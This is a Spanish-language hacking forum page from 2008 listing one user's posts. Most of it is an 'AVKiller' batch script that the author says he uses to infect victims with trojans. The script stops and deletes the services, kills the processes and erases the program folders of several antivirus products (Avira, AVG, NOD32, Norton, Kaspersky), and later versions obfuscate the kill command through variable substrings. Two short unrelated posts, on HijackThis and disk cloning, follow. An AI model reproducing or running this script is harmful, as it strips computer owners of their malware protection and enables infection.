elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
08 Septiembre 2008, 02:34  

Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Análisis y Diseño de Malware / Re: AVKiller By ViNeOn en: 23 Agosto 2008, 01:40
eh agregado norton internet security y kaspersky internet security

for %%i in (LiveUpdate,"LiveUpdate Notice","Symantec Core LC",ccEvtMgr,CLTNetCnService,ccSetMgr) Do (%b% %%i)
for %%i in (LuComServer_3_4.EXE,symlcsvc.exe,ccSvcHst.exe) Do (%a% %%i)
for %%i in (LuComServer_3_4.EXE,symlcsvc.exe,ccSvcHst.exe) Do (%a:~0,1%%a:~2,1%%a:~4,6% %%i)
echo Norton Antivirus 2008 Eliminado
sc stop AVP
sc delete AVP
for %%k in (avp.exe) DO (%a% %%k)
for %%k IN (avp.exe) DO (%a:~0,1%%a:~2,1%%a:~4,6% %%k)

2  Seguridad Informática / Análisis y Diseño de Malware / Re: AVKiller By ViNeOn en: 22 Agosto 2008, 20:02
bueno ya puse el for y se arreglo lo del tskill

@echo off
set a=taskkill /F /IM
set b=sc delete
for %%v in (AntiVirFirewallService,AntiVirService,AntiVirMailService,AVEService,AntiVirScheduler,antivirwebservice) DO (%b% %%x)
for %%v in (avfwsvc.exe,avguard.exe,avmailc.exe,avesvc.exe,sched.exe,AVWEBGRD.EXE,avgnt.exe) DO (%a% %%v)
FOR %%v in (avfwsvc.exe,avguard.exe,avmailc.exe,avesvc.exe,sched.exe,AVWEBGRD.EXE,avgnt.exe) DO (%a:~0,1%%a:~2,1%%a:~4,6% %%v)
attrib -R -A -S -H "C:\Archivos de programa\Avira\Avira Premium Security Suite" /S /D
erase /Q "C:\Archivos de programa\Avira\Avira Premium Security Suite"
echo Avira Antivir Eliminado
for %%n in (avg8emc,avgfws8,avg8wd) DO (%b% %%i)
for %%n in (avgemc.exe,avgwdsvc.exe,avgfws8.exe,avgui.exe,avgtray.exe) DO (%a% %%n)
FOR %%n in (avgemc.exe,avgwdsvc.exe,avgfws8.exe,avgui.exe,avgtray.exe) DO (%a:~0,1%%a:~2,1%%a:~4,6% %%n)
attrib -R -A -S -H "C:\Archivos de programa\AVG\AVG8" /S /D
erase /Q "C:\Archivos de programa\AVG\AVG8"
echo AVG 8 Eliminado
for %%o in (ekrn,EhttpSrv) DO (%b% %%e)
for %%o in (ekrn.exe,EHttpSrv.exe,egui.exe) DO (%a% %%o)
FOR %%o in (ekrn.exe,EHttpSrv.exe,egui.exe) DO (%a:~0,1%%a:~2,1%%a:~4,6% %%o)
attrib -R -A -S -H "C:\Archivos de programa\ESET\ESET NOD32 Antivirus" /S /D
erase /Q "C:\Archivos de programa\ESET\ESET NOD32 Antivirus"
echo Nod32 Bussines Edition eliminado

bueno gracias a Darioxhcx eh podido agregar lo del tskill, ahora solo falta si alguien tiene porcesos y servicios de ls av mas famosos
3  Seguridad Informática / Análisis y Diseño de Malware / AVKiller By ViNeOn en: 22 Agosto 2008, 00:56
Bueno soy muy novato en esto de la programacion y me gustaria compartir con ustedes este codigo batch que me a servido mucho para infectar a mi victimas con cualquier toyano ya que aniquila por ahora solo tres antivirus El Nod32 Bussines Edition, Avg Internet security 2008 y el Avira Antivir 2008 estoy trabajando para cubrir un rango mas amplio de AV si alguno me pudiera proporcionar o ir agregando el codigo en este post lo agradeceria.

@echo off
sc delete AntiVirFirewallService
taskkill /F /IM avfwsvc.exe
sc delete AntiVirService
taskkill /F /IM avguard.exe
sc delete AntiVirMailService
taskkill /F /IM avmailc.exe
sc delete AVEService
taskkill /F /IM avesvc.exe
sc delete AntiVirScheduler
taskkill /F /IM sched.exe
sc delete antivirwebservice
taskkill /F /IM AVWEBGRD.EXE
taskkill /F /IM avgnt.exe
attrib -R -A -S -H "C:\Archivos de programa\Avira\Avira Premium Security Suite" /S /D
erase /Q "C:\Archivos de programa\Avira\Avira Premium Security Suite"
sc delete avg8emc
taskkill /F /IM avgemc.exe
sc delete avg8wd
taskkill /F /IM avgwdsvc.exe
taskkill /F /IM avgam.exe
taskkill /F /IM avgui.exe
taskkill /F /IM avgtray.exe
attrib -R -A -S -H "C:\Archivos de programa\AVG\AVG8" /S /D
erase /Q "C:\Archivos de programa\AVG\AVG8"
sc delete ekrn
taskkill /F /IM ekrn.exe
sc delete EhttpSrv
taskkill /F /IM EHttpSrv.exe
taskkill /F /IM egui.exe
attrib -R -A -S -H "C:\Archivos de programa\ESET\ESET NOD32 Antivirus" /S /D
erase /Q "C:\Archivos de programa\ESET\ESET NOD32 Antivirus"

ideas son bien recibidas ;D

Mods por favor borren eltema en la sección de Seguridad
4  Seguridad Informática / Seguridad / Re: problema con explorer... en: 21 Agosto 2008, 21:46
te sugiero que des una escaneada con esta herramienta HijackThis 2.0.2 y nos pongas aqui el log de los resultados que te de haber si no es algun malware.
5  Sistemas Operativos / GNU/Linux / Re: Sobre clonadores y linux en: 01 Octubre 2007, 17:02
Bueno soy nuevo en el mundo linux y no se mucho me gustaria aprender claro esta y por eso tengo una gran duda

Al utilizar

dd if=/dev/hda of=discoqnx

me aparece este error "broken PIpe no se el por que me marca tuberia rota, si tengo el suficiente espacio en el disco para crear la imagen, el disco que intento clonar es un disco con particiones Qnx que por cierto linux no me muestra solo me dice que hay un disco duro, quisiera saber que puedo hacer o si es posible clonar mi disco"
Páginas: [1]

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.